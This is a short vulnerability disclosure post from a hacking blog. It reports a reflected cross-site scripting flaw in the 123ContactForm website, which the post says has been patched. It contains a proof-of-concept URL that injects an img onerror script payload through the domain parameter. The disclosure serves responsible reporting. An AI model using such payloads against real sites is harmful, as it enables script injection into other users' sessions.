All Hacking Tools And Hacking Tutorials Are Only For Education Purposes,..

Cross Site Scripting (XSS) Found in 123ContactForm - FOCSoft

Description:-

Team_CC, An independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in 123contactform.com, which can be exploited by an attacker to conduct XSS attacks.


Proof of concept:-


http://www.123contactform.com/index.php?domain=1%3Cimg%20src=x%20onerror=prompt%281%29%3E&module=login&p=new_user_validate&plan=0&sid=1v3di81f8htapinfjt2k0es3b5&u_openidtype=1



 Cross Site Scripting (XSS) Found in 123ContactForm - FOCSoft
FOCSoft.BlogSpot.Com


Conclusion:-


This vulnerability has been confirmed and patched by 123ContactForm Security Team. I would like to thank them for their quick response to my report.


123ContactForm Hall of Fame:-


http://www.123contactform.com/security-acknowledgements.htm



 Cross Site Scripting (XSS) Found in 123ContactForm - FOCSoft
FOCSoft.BlogSpot.Com

Please Share This Post With Your Frinds :) FOCSoft
SOCIALIZE IT →
FOLLOW US →
SHARE IT →

1 Comments:

If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.

Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!

Thanks for reading,
Administrator Of FOCSoft

Stay Updated With Facebook
Please Click Like Button

Receive Free Updates (EMail):

Powered By FOCSoft